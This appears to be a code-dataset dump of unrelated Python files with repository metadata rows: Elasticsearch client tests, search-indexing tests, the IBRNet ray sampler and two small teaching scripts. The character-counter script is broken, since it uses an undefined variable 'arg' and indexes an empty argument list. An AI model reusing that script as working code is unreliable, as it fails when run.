self.client.close_scrolls()
func_mock.assert_called_once_with(
{'scroll_id': ['a', 'b', 'c']})
self.assertSetEqual(set(), self.client._scroll_ids)
def test_bulk_with_instruction(self):
instruction = {'instruction': {}}
terms = ('one', 'two', 'three')
expected_data = ''.join([
'{"instruction": {}}\n'
'"one"\n'
'{"instruction": {}}\n'
'"two"\n'
'{"instruction": {}}\n'
'"three"\n',
])
with mock.patch.object(self.client, '_req') as rmock:
self.client.bulk_with_instruction(instruction, terms)
rmock.assert_called_once_with(
self.client._sess.post,
'http://elasticsearch:9200/index_name/test_mapping/_bulk',
expected_data, None, deserialize=False)
def test_bulk_index(self):
terms = ('one', 'two', 'three')
with mock.patch.object(self.client, 'bulk_with_instruction') as fmock:
self.client.bulk_index(terms)
fmock.assert_called_once_with({'index': {}}, terms)
def test_commit(self):
docs = ['one', 'two', 'three', 'four', 'five', 'six', 'seven']
size = 3
with mock.patch.object(self.client, 'bulk_index') as bulk_mock:
with mock.patch.object(self.client, '_docs', new=docs):
with mock.patch.object(self.client, '_chunk_size', new=size):
self.client.commit()
bulk_mock.assert_has_calls([
mock.call(['one', 'two', 'three']),
mock.call(['four', 'five', 'six']),
mock.call(['seven']),
])
def test_add_point_no_autocommit(self):
point = dataframe.DataPoint(
'unit', '0.42', '0.1337', {}, {})
start = datetime.datetime(2019, 1, 1)
end = datetime.datetime(2019, 1, 1, 1)
with mock.patch.object(self.client, 'commit') as func_mock:
with mock.patch.object(self.client, '_autocommit', new=False):
with mock.patch.object(self.client, '_chunk_size', new=3):
self.client._docs = []
for _ in range(5):
self.client.add_point(
point, 'awesome_type', start, end)
func_mock.assert_not_called()
self.assertEqual(self.client._docs, [{
'start': start,
'end': end,
'type': 'awesome_type',
'unit': point.unit,
'qty': point.qty,
'price': point.price,
'groupby': point.groupby,
'metadata': point.metadata,
} for _ in range(5)])
self.client._docs = []
def test_add_point_with_autocommit(self):
point = dataframe.DataPoint(
'unit', '0.42', '0.1337', {}, {})
start = datetime.datetime(2019, 1, 1)
end = datetime.datetime(2019, 1, 1, 1)
commit_calls = {'count': 0}
def commit():
# We can't re-assign nonlocal variables in python2
commit_calls['count'] += 1
self.client._docs = []
with mock.patch.object(self.client, 'commit', new=commit):
with mock.patch.object(self.client, '_autocommit', new=True):
with mock.patch.object(self.client, '_chunk_size', new=3):
self.client._docs = []
for i in range(5):
self.client.add_point(
point, 'awesome_type', start, end)
self.assertEqual(commit_calls['count'], 1)
self.assertEqual(self.client._docs, [{
'start': start,
'end': end,
'type': 'awesome_type',
'unit': point.unit,
'qty': point.qty,
'price': point.price,
'groupby': point.groupby,
'metadata': point.metadata,
} for _ in range(2)])
# cleanup
self.client._docs = []
def test_delete_by_query_with_must(self):
with mock.patch.object(self.client, '_req') as rmock:
with mock.patch.object(self.client, '_build_must') as func_mock:
func_mock.return_value = {'a': 'b'}
self.client.delete_by_query()
rmock.assert_called_once_with(
self.client._sess.post,
'http://elasticsearch:9200/index_name/_delete_by_query',
'{"query": {"bool": {"must": {"a": "b"}}}}', None)
def test_delete_by_query_no_must(self):
with mock.patch.object(self.client, '_req') as rmock:
with mock.patch.object(self.client, '_build_must') as func_mock:
func_mock.return_value = {}
self.client.delete_by_query()
rmock.assert_called_once_with(
self.client._sess.post,
'http://elasticsearch:9200/index_name/_delete_by_query',
None, None)
def test_retrieve_no_pagination(self):
search_resp = {
'_scroll_id': '000',
'hits': {'hits': ['one', 'two', 'three'], 'total': 12},
}
scroll_resps = [{
'_scroll_id': str(i + 1) * 3,
'hits': {'hits': ['one', 'two', 'three']},
} for i in range(3)]
scroll_resps.append({'_scroll_id': '444', 'hits': {'hits': []}})
self.client._scroll_ids = set()
with mock.patch.object(self.client, 'search') as search_mock:
with mock.patch.object(self.client, 'scroll') as scroll_mock:
with mock.patch.object(self.client, 'close_scrolls') as close:
search_mock.return_value = search_resp
scroll_mock.side_effect = scroll_resps
total, resp = self.client.retrieve(
None, None, None, None, paginate=False)
search_mock.assert_called_once()
scroll_mock.assert_has_calls([
mock.call({
'scroll_id': str(i) * 3,
'scroll': '60s',
}) for i in range(4)
])
self.assertEqual(total, 12)
self.assertEqual(resp, ['one', 'two', 'three'] * 4)
self.assertSetEqual(self.client._scroll_ids,
set(str(i) * 3 for i in range(5)))
close.assert_called_once()
self.client._scroll_ids = set()
def test_retrieve_with_pagination(self):
search_resp = {
'_scroll_id': '000',
'hits': {'hits': ['one', 'two', 'three'], 'total': 12},
}
scroll_resps = [{
'_scroll_id': str(i + 1) * 3,
'hits': {'hits': ['one', 'two', 'three']},
} for i in range(3)]
scroll_resps.append({'_scroll_id': '444', 'hits': {'hits': []}})
self.client._scroll_ids = set()
with mock.patch.object(self.client, 'search') as search_mock:
with mock.patch.object(self.client, 'scroll') as scroll_mock:
with mock.patch.object(self.client, 'close_scrolls') as close:
search_mock.return_value = search_resp
scroll_mock.side_effect = scroll_resps
total, resp = self.client.retrieve(
None, None, None, None,
offset=2, limit=4, paginate=True)
search_mock.assert_called_once()
scroll_mock.assert_called_once_with({
'scroll_id': '000',
'scroll': '60s',
})
self.assertEqual(total, 12)
self.assertEqual(resp, ['three', 'one', 'two', 'three'])
self.assertSetEqual(self.client._scroll_ids,
set(str(i) * 3 for i in range(2)))
close.assert_called_once()
self.client._scroll_ids = set()
def _do_test_total(self, groupby, paginate):
with mock.patch.object(self.client, 'search') as search_mock:
if groupby:
search_resps = [{
'aggregations': {
'sum_and_price': {
'buckets': ['one', 'two', 'three'],
'after_key': str(i),
}
}
} for i in range(3)]
last_resp_aggs = search_resps[2]['aggregations']
last_resp_aggs['sum_and_price'].pop('after_key')
last_resp_aggs['sum_and_price']['buckets'] = []
search_mock.side_effect = search_resps
else:
search_mock.return_value = {
'aggregations': ['one', 'two', 'three'],
}
resp = self.client.total(None, None, None, None, groupby,
offset=2, limit=4, paginate=paginate)
if not groupby:
search_mock.assert_called_once()
return resp
def test_total_no_groupby_no_pagination(self):
total, aggs = self._do_test_total(None, False)
self.assertEqual(total, 1)
self.assertEqual(aggs, [['one', 'two', 'three']])
def test_total_no_groupby_with_pagination(self):
total, aggs = self._do_test_total(None, True)
self.assertEqual(total, 1)
self.assertEqual(aggs, [['one', 'two', 'three']])
def test_total_with_groupby_no_pagination(self):
total, aggs = self._do_test_total(['x'], False)
self.assertEqual(total, 6)
self.assertEqual(aggs, ['one', 'two', 'three'] * 2)
def test_total_with_groupby_with_pagination(self):
total, aggs = self._do_test_total(['x'], True)
self.assertEqual(total, 6)
self.assertEqual(aggs, ['three', 'one', 'two', 'three'])
| 40.616977
| 79
| 0.524569
|
5be2c43ad0a66fe0abbe48f101d8d1f644e8734c
| 475
|
py
|
Python
|
lectures/07-python-dictionaries/examples/char_count1.py
|
donaldscoon/biosys-analytics
|
8d4593277bd701c77ff5c2d5eb3aee7c67ab33a4
|
[
"MIT"
] | 1
|
2019-01-15T16:30:25.000Z
|
2019-01-15T16:30:25.000Z
|
lectures/07-python-dictionaries/examples/char_count1.py
|
donaldscoon/biosys-analytics
|
8d4593277bd701c77ff5c2d5eb3aee7c67ab33a4
|
[
"MIT"
] | null | null | null |
lectures/07-python-dictionaries/examples/char_count1.py
|
donaldscoon/biosys-analytics
|
8d4593277bd701c77ff5c2d5eb3aee7c67ab33a4
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""Character counter"""
import sys
import os
from collections import Counter
args = sys.argv[1:]
if len(args) != 1:
print('Usage: {} INPUT'.format(os.path.basename(args[0])))
sys.exit(1)
file = args[0]
text = ''
if os.path.isfile(arg):
text = ''.join(open(arg).read().splitlines())
else:
text = arg
count = Counter(text.lower())
for letter, num in count.items():
print('{} {:5}'.format(letter, num))
| 18.269231
| 63
| 0.595789
|
960bed93b5f86286d58e0591b45527a8bf17acd6
| 18,159
|
py
|
Python
|
tests/test_search.py
|
mubashshirjamal/code
|
d9c7adf7efed8e9c1ab3ff8cdeb94e7eb1a45382
|
[
"BSD-3-Clause"
] | 1,582
|
2015-01-05T02:41:44.000Z
|
2022-03-30T20:03:22.000Z
|
tests/test_search.py
|
mubashshirjamal/code
|
d9c7adf7efed8e9c1ab3ff8cdeb94e7eb1a45382
|
[
"BSD-3-Clause"
] | 66
|
2015-01-23T07:58:04.000Z
|
2021-11-12T02:23:27.000Z
|
tests/test_search.py
|
mubashshirjamal/code
|
d9c7adf7efed8e9c1ab3ff8cdeb94e7eb1a45382
|
[
"BSD-3-Clause"
] | 347
|
2015-01-05T07:47:07.000Z
|
2021-09-20T21:22:32.000Z
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import shutil
import vilya.models.elastic as _el
from nose import SkipTest
from tests.base import TestCase
from tests.utils import delete_project
from vilya.libs.search import code_unittest_client
import vilya.models.elastic.indexer as _index
import vilya.models.elastic.searcher as _search
import vilya.models.elastic.issue_pr_search as _isprsearch
import vilya.models.elastic.src_search as _srcsearch
import vilya.models.elastic.user_search as _usersearch
import vilya.models.elastic.repo_search as _reposearch
from vilya.models.elastic.issue_pr_search import (
IssuePRSearch, IssueSearch, PullRequestSearch)
from vilya.models.elastic.searcher import SearchEngine
from vilya.models.project_issue import ProjectIssue
from vilya.models.ticket import Ticket
from vilya.models.project import CodeDoubanProject
from vilya.models.sphinx_docs import SphinxDocs
from vilya.models.gist import Gist
from vilya.models.git import make_git_env
from vilya.models.user import User
from vilya.models.pull import PullRequest, add_pull
from vilya.libs.permdir import get_tmpdir
base_yaml_conf = """
sphinx_docs:
dir: ""
"""
base_index_rst = """
Unit testing sphinx docs
========================
.. toctree::
:glob:
*
"""
base_document1_rst = """
Test doc1
=========
Something here
"""
base_document2_rst = """
Test doc2
=========
Something here
"""
src_source1_py = """
from elastic import src_search
def test():
return 'hello'
"""
src_source2_c = """
#include <stdio.h>
int main()
{
printf(\"%d\n\", 3);
return 0;
}
"""
SKIP_TEST = True
def skip_test(*args, **kwargs):
if SKIP_TEST:
raise SkipTest(*args, **kwargs)
_index.IndexEngine.c = code_unittest_client
_search.SearchEngine.c = code_unittest_client
_el.CodeSearch.c = code_unittest_client
_el.SearchEngine.c = code_unittest_client
_isprsearch.SearchEngine.c = code_unittest_client
_isprsearch.IndexEngine.c = code_unittest_client
_srcsearch.SearchEngine.c = code_unittest_client
_srcsearch.IndexEngine.c = code_unittest_client
_reposearch.SearchEngine.c = code_unittest_client
_reposearch.IndexEngine.c = code_unittest_client
_usersearch.SearchEngine.c = code_unittest_client
_usersearch.IndexEngine.c = code_unittest_client
class TestProject(TestCase):
def setUp(self):
super(TestProject, self).setUp()
_el.CodeSearch.c.delete()
def _prj(self):
delete_project('test')
prj = CodeDoubanProject.add('test', 'owner', create_trac=False)
return prj
def _add(self, prj, fn, content):
u = self.addUser()
prj.git.commit_one_file(fn, content, 'add %s' % fn, u)
def test_empty_project(self):
p = self._prj()
_el.CodeSearch.index_a_project_docs(p.id)
ds = _el.DocsSearch(p.id)
ret = ds._doc_file_as_dict('path', 'name', 'doc_dir')
assert not ret
def test_create_with_index_and_doc(self):
prj = self._prj()
# self._add(prj, 'code_config.yaml', base_yaml_conf)
self._add(prj, 'docs/index.rst', base_index_rst)
self._add(prj, 'docs/doc1.rst', base_document1_rst)
sd = SphinxDocs(prj.name)
sd.build_all()
_el.CodeSearch.index_a_project_docs(prj.id)
ds = _el.DocsSearch(prj.id)
ret = ds._doc_file_as_dict('docs/doc1.rst', 'docs', 'docs')
assert ret['doc_name'] == 'docs'
assert ret['url'] == 'docs/rstdocs/doc1/'
assert ret['content'] == base_document1_rst
assert ret['type'] == 'docs'
assert ret['doc_dir'] == 'docs'
_el.CodeSearch.delete_a_project_docs(prj.id)
def test_doc_file_datas(self):
skip_test()
prj = self._prj()
self._add(prj, 'docs/index.rst', base_index_rst)
self._add(prj, 'docs/doc1.rst', base_document1_rst)
ds = _el.DocsSearch(prj.id)
big_search_data = ds.doc_file_datas()
assert len(big_search_data) == 2
_el.CodeSearch.delete_a_project_docs(prj.id)
def test_index_a_project_docs(self):
skip_test()
prj = self._prj()
self._add(prj, 'docs/index.rst', base_index_rst)
self._add(prj, 'docs/doc1.rst', base_document1_rst)
_el.CodeSearch.index_a_project_docs(prj.id)
res = _el.CodeSearch.search_a_phrase('Something', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 1
_el.CodeSearch.delete_a_project_docs(prj.id)
def test_index_a_project_docs_search_no_result(self):
skip_test()
prj = self._prj()
self._add(prj, 'docs/index.rst', base_index_rst)
self._add(prj, 'docs/doc1.rst', base_document1_rst)
_el.CodeSearch.index_a_project_docs(prj.id)
res = _el.CodeSearch.search_a_phrase(
'SomethingXXXXXX', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 0
_el.CodeSearch.delete_a_project_docs(prj.id)
def test_html_index_a_project_docs(self):
skip_test()
prj = self._prj()
self._add(prj, 'docs/index.html', "<h1>Test html page</h1>")
_el.CodeSearch.index_a_project_docs(prj.id)
res = _el.CodeSearch.search_a_phrase('Something', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 0
_el.CodeSearch.delete_a_project_docs(prj.id)
def test_cleared_page_not_indexd(self):
skip_test()
prj = self._prj()
self._add(prj, 'docs/index.rst', "aaa")
_el.CodeSearch.index_a_project_docs(prj.id)
res = _el.CodeSearch.search_a_phrase('aaa', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 1
self._add(prj, 'docs/index.rst', "")
_el.CodeSearch.index_a_project_docs(prj.id)
res = _el.CodeSearch.search_a_phrase('aaa', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 0
_el.CodeSearch.delete_a_project_docs(prj.id)
def test_removed_page_not_indexd(self):
raise SkipTest("advanced index way doesn't exist now.")
prj = self._prj()
self._add(prj, 'docs/index.rst', base_index_rst)
self._add(prj, 'docs/doc1.rst', 'aaa')
_el.CodeSearch.index_a_project_docs(prj.id)
res = _el.CodeSearch.search_a_phrase('aaa', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 1
prj.git.call('read-tree HEAD')
temp_dir = get_tmpdir()
env = make_git_env(is_anonymous=True)
prj.git.call('--work-tree %s checkout-index --force -a' % temp_dir)
prj.git.call(['--work-tree', temp_dir, 'rm', 'docs/doc1.rst'])
prj.git.call(['--work-tree', temp_dir, 'commit', '-m', 'm'], _env=env)
_el.CodeSearch.index_a_project_docs(prj.id)
res = _el.CodeSearch.search_a_phrase('aaa', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 0, \
"Should find no results after removing and reindexing"
_el.CodeSearch.delete_a_project_docs(prj.id)
shutil.rmtree(temp_dir)
class TestGist(TestCase):
def setUp(self):
super(TestGist, self).setUp()
_el.CodeSearch.c.delete()
def _gist(self):
gist = Gist.add('description', 'testuser', is_public=True)
return gist
def test_empty_repo(self):
skip_test()
gist = self._gist()
_el.CodeSearch.index_a_gist(gist.id)
res = _el.CodeSearch.search_a_phrase('testuser', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 1
_el.CodeSearch.delete_a_gist(gist.id)
def test_search_repo_file(self):
skip_test()
gist = self._gist()
gist.update(description='description',
gist_names=['file1', 'file2'],
gist_contents=['document', 'document'])
_el.CodeSearch.index_a_gist(gist.id)
res = _el.CodeSearch.search_a_phrase('file2', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 1
res = _el.CodeSearch.search_a_phrase('document', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 1
_el.CodeSearch.delete_a_gist(gist.id)
def test_change_files(self):
skip_test()
gist = self._gist()
_el.CodeSearch.index_a_gist(gist.id)
res = _el.CodeSearch.search_a_phrase('description', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 1
gist.update(description='desc',
gist_names=['file1', 'file2'],
gist_contents=['document', 'document'])
_el.CodeSearch.index_a_gist(gist.id)
res = _el.CodeSearch.search_a_phrase('description', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 0
res = _el.CodeSearch.search_a_phrase('file2', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 1
gist.update(description='desc',
gist_names=['f1'],
gist_contents=['text'])
_el.CodeSearch.index_a_gist(gist.id)
res = _el.CodeSearch.search_a_phrase('text', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 1
res = _el.CodeSearch.search_a_phrase('file2', from_=0, size=100)
res = _el.CodeSearch.format_search_result(res)
assert len(res) == 0
_el.CodeSearch.delete_a_gist(gist.id)
class TestIssue(TestCase):
def setUp(self):
super(TestIssue, self).setUp()
_index.IndexEngine.c.delete()
def _prj(self, proj_name):
prj = CodeDoubanProject.add(proj_name, 'owner', create_trac=False)
return prj
def test_single_project(self):
skip_test()
p = self._prj("test")
iss1 = ProjectIssue.add(title='title1', description='desc1',
creator='owner', project=p.id)
IssueSearch.index_a_project_issue(p)
res = IssueSearch.search_a_phrase('owner', p.id)
res = SearchEngine.decode(res, ('issue_id',))
res = [id for id, in res]
assert len(res) == 1
assert res[0] == iss1.id
iss2 = ProjectIssue.add(title='title2', description='desc2',
creator='owner', project=p.id)
IssueSearch.index_a_project_issue(p)
res = IssueSearch.search_a_phrase('owner', p.id)
res = SearchEngine.decode(res, ('issue_id',))
res = [id for id, in res]
assert len(res) == 2
assert iss1.id in res
assert iss2.id in res
def test_multiple_project(self):
skip_test()
p1 = self._prj("test_1")
p2 = self._prj("test_2")
iss1 = ProjectIssue.add(title='title1', description='desc1',
creator='owner', project=p1.id)
iss2 = ProjectIssue.add(title='title1', description='desc1',
creator='owner', project=p2.id)
IssueSearch.index_a_project_issue(p1)
IssueSearch.index_a_project_issue(p2)
res = IssueSearch.search_a_phrase('title1', p1.id)
res = SearchEngine.decode(res, ('issue_id',))
res = [id for id, in res]
assert len(res) == 1
assert res[0] == iss1.id
res = IssueSearch.search_a_phrase('title1', p2.id)
res = SearchEngine.decode(res, ('issue_id',))
res = [id for id, in res]
assert len(res) == 1
assert res[0] == iss2.id
class TestPullRequest(TestCase):
def setUp(self):
super(TestPullRequest, self).setUp()
_index.IndexEngine.c.delete()
def _prj(self, proj_name, owner_id, fork_from=None):
prj = CodeDoubanProject.add(proj_name, owner_id, create_trac=False,
fork_from=fork_from)
return prj
def _add(self, prj, u, fn, content):
prj.git.commit_one_file(fn, content, 'add %s' % fn, u)
def test_single_project(self):
skip_test()
u_to = User("admin")
u_from = User("testuser")
to_proj = self._prj("test", "admin")
self._add(to_proj, u_to, "README.md", "hi")
from_proj = self._prj("testuser/test", "testuser", to_proj.id)
self._add(from_proj, u_from, "README.md", "hello")
pullreq = PullRequest.open(from_proj, "master", to_proj, "master")
ticket = Ticket(None, None, to_proj.id, "title", "desc", "testuser",
None, None)
pullreq = add_pull(ticket, pullreq, u_from)
ticket = pullreq.ticket
PullRequestSearch.index_a_project_pr(to_proj)
res = PullRequestSearch.search_a_phrase('title', to_proj.id)
res = SearchEngine.decode(res, ('to_proj_id',))
res = [id for id, in res]
assert len(res) == 1
class TestProjectIssuePR(TestCase):
def setUp(self):
super(TestProjectIssuePR, self).setUp()
_index.IndexEngine.c.delete()
def _prj(self, proj_name, owner_id, fork_from=None):
prj = CodeDoubanProject.add(proj_name, owner_id, create_trac=False,
fork_from=fork_from)
return prj
def _add(self, prj, u, fn, content):
prj.git.commit_one_file(fn, content, 'add %s' % fn, u)
def test_single_project(self):
skip_test()
u_to = User("admin")
u_from = User("testuser")
to_proj = self._prj("test", "admin")
self._add(to_proj, u_to, "README.md", "hi")
from_proj = self._prj("testuser/test", "testuser", to_proj.id)
self._add(from_proj, u_from, "README.md", "hello")
pullreq = PullRequest.open(from_proj, "master", to_proj, "master")
ticket = Ticket(None, None, to_proj.id, "title", "desc", "testuser",
None, None)
pullreq = add_pull(ticket, pullreq, u_from)
iss = ProjectIssue.add(title='title1', description='desc1',
creator='owner', project=to_proj.id)
IssuePRSearch.index_a_project(to_proj)
res = IssueSearch.search_a_phrase('title1', to_proj.id)
res = SearchEngine.decode(res, ('issue_id',))
res = [id for id, in res]
assert len(res) == 1
assert res[0] == iss.id
res = PullRequestSearch.search_a_phrase('title', to_proj.id)
res = SearchEngine.decode(res, ('issue_id',))
res = [id for id, in res]
assert len(res) == 1
class TestSrcSearch(TestCase):
def setUp(self):
super(TestSrcSearch, self).setUp()
_srcsearch.IndexEngine.c.delete()
_srcsearch.IndexEngine.c.put('')
_srcsearch.SrcSearch.update_mapping()
def _prj(self):
delete_project('test')
prj = CodeDoubanProject.add('test', 'owner', create_trac=False)
return prj
def _add(self, prj, fn, content):
u = self.addUser()
prj.git.commit_one_file(fn, content, 'add %s' % fn, u)
def test_get_src_indexes_from_project(self):
p = self._prj()
self._add(p, 'index.rst', base_index_rst)
self._add(p, 'yaml.conf', base_yaml_conf)
self._add(p, 'src/source1.py', src_source1_py)
self._add(p, 'src/source2.c', src_source2_c)
indexes = _srcsearch.SrcSearch.get_src_indexes_from_project(p)
assert len(indexes) == 4
indexes_values = [v for k, v in indexes]
names = [data['name'] for data in indexes_values]
for name in ['index.rst', 'yaml.conf', 'src/source1.py',
'src/source2.c']:
assert name in names
index_obj_ids = [(k, v['id']) for k, v in indexes]
for index_id, obj_id in index_obj_ids:
assert str(p.id) + obj_id == index_id
name_data_dict = {data['name']: data for data in indexes_values}
assert name_data_dict['src/source1.py']['language'] == 'Python'
assert name_data_dict['src/source2.c']['language'] == 'C'
assert name_data_dict['yaml.conf']['language'] == 'Text'
assert name_data_dict['index.rst']['language'] == 'Text'
for data in indexes_values:
assert data['project'] == p.name
def test_single_project_index(self):
skip_test()
p = self._prj()
self._add(p, 'index.rst', base_index_rst)
self._add(p, 'yaml.conf', base_yaml_conf)
self._add(p, 'src/source1.py', src_source1_py)
_srcsearch.SrcSearch.index_a_project(p)
ids = _srcsearch.SrcSearch.query_a_project_objs(p.name, fields=('id',))
assert len(ids) == 3
self._add(p, 'src/source2.c', src_source2_c)
_srcsearch.SrcSearch.update_a_project_index(p)
ids = _srcsearch.SrcSearch.query_a_project_objs(p.name, fields=('id',))
assert len(ids) == 4
_srcsearch.SrcSearch.delete_a_project_index(p)
ids = _srcsearch.SrcSearch.query_a_project_objs(p.name, fields=('id',))
assert len(ids) == 0
class TestRepoSearch(TestCase):
def setUp(self):
super(TestRepoSearch, self).setUp()
_reposearch.IndexEngine.c.delete()
def test_multiple_project_index(self):
skip_test()
for i in range(5):
CodeDoubanProject.add('test%s' % i, 'owner', create_trac=False)
_reposearch.RepoSearch.index_repos()
objs = _reposearch.RepoSearch.query_repo_objs()
assert len(objs) == 5
class TestUserSearch(TestCase):
def setUp(self):
super(TestUserSearch, self).setUp()
_usersearch.IndexEngine.c.delete()
def test_multiple_project_index(self):
skip_test()
for i in range(5):
CodeDoubanProject.add(
'test%s' % i, 'owner%s' % i, create_trac=False)
_usersearch.UserSearch.index_users()
objs = _usersearch.UserSearch.query_user_objs()
assert len(objs) == 5
| 35.816568
| 79
| 0.63346
|
b3b1e5a5a97551a97e88acd956f19d04b673ba51
| 6,075
|
py
|
Python
|
ibrnet/sample_ray.py
|
QiuhongAnnaWei/IBRNet
|
6c8b68e6d95eae04535ff0906387ec7899f5d5ce
|
[
"Apache-2.0"
] | 254
|
2021-02-26T09:08:03.000Z
|
2022-03-27T05:09:26.000Z
|
ibrnet/sample_ray.py
|
QiuhongAnnaWei/IBRNet
|
6c8b68e6d95eae04535ff0906387ec7899f5d5ce
|
[
"Apache-2.0"
] | 10
|
2021-05-18T15:12:33.000Z
|
2022-03-22T01:53:47.000Z
|
ibrnet/sample_ray.py
|
QiuhongAnnaWei/IBRNet
|
6c8b68e6d95eae04535ff0906387ec7899f5d5ce
|
[
"Apache-2.0"
] | 35
|
2021-04-13T14:37:14.000Z
|
2022-03-13T23:06:59.000Z
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import torch
import torch.nn.functional as F
rng = np.random.RandomState(234)
########################################################################################################################
# ray batch sampling
########################################################################################################################
def parse_camera(params):
H = params[:, 0]
W = params[:, 1]
intrinsics = params[:, 2:18].reshape((-1, 4, 4))
c2w = params[:, 18:34].reshape((-1, 4, 4))
return W, H, intrinsics, c2w
def dilate_img(img, kernel_size=20):
import cv2
assert img.dtype == np.uint8
kernel = np.ones((kernel_size, kernel_size), np.uint8)
dilation = cv2.dilate(img / 255, kernel, iterations=1) * 255
return dilation
class RaySamplerSingleImage(object):
def __init__(self, data, device, resize_factor=1, render_stride=1):
super().__init__()
self.render_stride = render_stride
self.rgb = data['rgb'] if 'rgb' in data.keys() else None
self.camera = data['camera']
self.rgb_path = data['rgb_path']
self.depth_range = data['depth_range']
self.device = device
W, H, self.intrinsics, self.c2w_mat = parse_camera(self.camera)
self.batch_size = len(self.camera)
self.H = int(H[0])
self.W = int(W[0])
# half-resolution output
if resize_factor != 1:
self.W = int(self.W * resize_factor)
self.H = int(self.H * resize_factor)
self.intrinsics[:, :2, :3] *= resize_factor
if self.rgb is not None:
self.rgb = F.interpolate(self.rgb.permute(0, 3, 1, 2), scale_factor=resize_factor).permute(0, 2, 3, 1)
self.rays_o, self.rays_d = self.get_rays_single_image(self.H, self.W, self.intrinsics, self.c2w_mat)
if self.rgb is not None:
self.rgb = self.rgb.reshape(-1, 3)
if 'src_rgbs' in data.keys():
self.src_rgbs = data['src_rgbs']
else:
self.src_rgbs = None
if 'src_cameras' in data.keys():
self.src_cameras = data['src_cameras']
else:
self.src_cameras = None
def get_rays_single_image(self, H, W, intrinsics, c2w):
'''
:param H: image height
:param W: image width
:param intrinsics: 4 by 4 intrinsic matrix
:param c2w: 4 by 4 camera to world extrinsic matrix
:return:
'''
u, v = np.meshgrid(np.arange(W)[::self.render_stride], np.arange(H)[::self.render_stride])
u = u.reshape(-1).astype(dtype=np.float32) # + 0.5 # add half pixel
v = v.reshape(-1).astype(dtype=np.float32) # + 0.5
pixels = np.stack((u, v, np.ones_like(u)), axis=0) # (3, H*W)
pixels = torch.from_numpy(pixels)
batched_pixels = pixels.unsqueeze(0).repeat(self.batch_size, 1, 1)
rays_d = (c2w[:, :3, :3].bmm(torch.inverse(intrinsics[:, :3, :3])).bmm(batched_pixels)).transpose(1, 2)
rays_d = rays_d.reshape(-1, 3)
rays_o = c2w[:, :3, 3].unsqueeze(1).repeat(1, rays_d.shape[0], 1).reshape(-1, 3) # B x HW x 3
return rays_o, rays_d
def get_all(self):
ret = {'ray_o': self.rays_o.cuda(),
'ray_d': self.rays_d.cuda(),
'depth_range': self.depth_range.cuda(),
'camera': self.camera.cuda(),
'rgb': self.rgb.cuda() if self.rgb is not None else None,
'src_rgbs': self.src_rgbs.cuda() if self.src_rgbs is not None else None,
'src_cameras': self.src_cameras.cuda() if self.src_cameras is not None else None,
}
return ret
def sample_random_pixel(self, N_rand, sample_mode, center_ratio=0.8):
if sample_mode == 'center':
border_H = int(self.H * (1 - center_ratio) / 2.)
border_W = int(self.W * (1 - center_ratio) / 2.)
# pixel coordinates
u, v = np.meshgrid(np.arange(border_H, self.H - border_H),
np.arange(border_W, self.W - border_W))
u = u.reshape(-1)
v = v.reshape(-1)
select_inds = rng.choice(u.shape[0], size=(N_rand,), replace=False)
select_inds = v[select_inds] + self.W * u[select_inds]
elif sample_mode == 'uniform':
# Random from one image
select_inds = rng.choice(self.H*self.W, size=(N_rand,), replace=False)
else:
raise Exception("unknown sample mode!")
return select_inds
def random_sample(self, N_rand, sample_mode, center_ratio=0.8):
'''
:param N_rand: number of rays to be casted
:return:
'''
select_inds = self.sample_random_pixel(N_rand, sample_mode, center_ratio)
rays_o = self.rays_o[select_inds]
rays_d = self.rays_d[select_inds]
if self.rgb is not None:
rgb = self.rgb[select_inds]
else:
rgb = None
ret = {'ray_o': rays_o.cuda(),
'ray_d': rays_d.cuda(),
'camera': self.camera.cuda(),
'depth_range': self.depth_range.cuda(),
'rgb': rgb.cuda() if rgb is not None else None,
'src_rgbs': self.src_rgbs.cuda() if self.src_rgbs is not None else None,
'src_cameras': self.src_cameras.cuda() if self.src_cameras is not None else None,
'selected_inds': select_inds
}
return ret
| 38.449367
| 120
| 0.569877
|
cf13f9d2eb7378159ff347beb4da214146517d26
| 437
|
py
|
Python
|
Pacote_download/Sobre Random.py
|
devluisg1/old_projects_python
|
a1fabcf154e1c574aa89e60968321d6e7489fdf1
|
[
"MIT"
] | null | null | null |
Pacote_download/Sobre Random.py
|
devluisg1/old_projects_python
|
a1fabcf154e1c574aa89e60968321d6e7489fdf1
|
[
"MIT"
] | null | null | null |
Pacote_download/Sobre Random.py
|
devluisg1/old_projects_python
|
a1fabcf154e1c574aa89e60968321d6e7489fdf1
|
[
"MIT"
] | null | null | null |
import random
from datetime import date
lista = ['pedra', 'papel', 'tesoura']
escolha = random.choice(lista)
print(escolha)
# MEU TESTE AQUI, NEM É SOBRE RANDOM, É MAIS SOBRE DATETIME
hoje = date.today().year
ano = 2003
atual = date.today().year
lista = []
for c in range(hoje, 2003, - 1):
if c % 4 == 0 and c % 100 != 0 or c % 400 == 0:
lista.append(366)
else:
lista.append(365)
print(lista)
print(sum(lista))
| 21.85
| 59
| 0.638444
|
cdc8abf329c7d22422d756e774d8e5c5fe6ff572
| 5,490
|
py
|
Python
|
setuptools_git_versioning.py
|
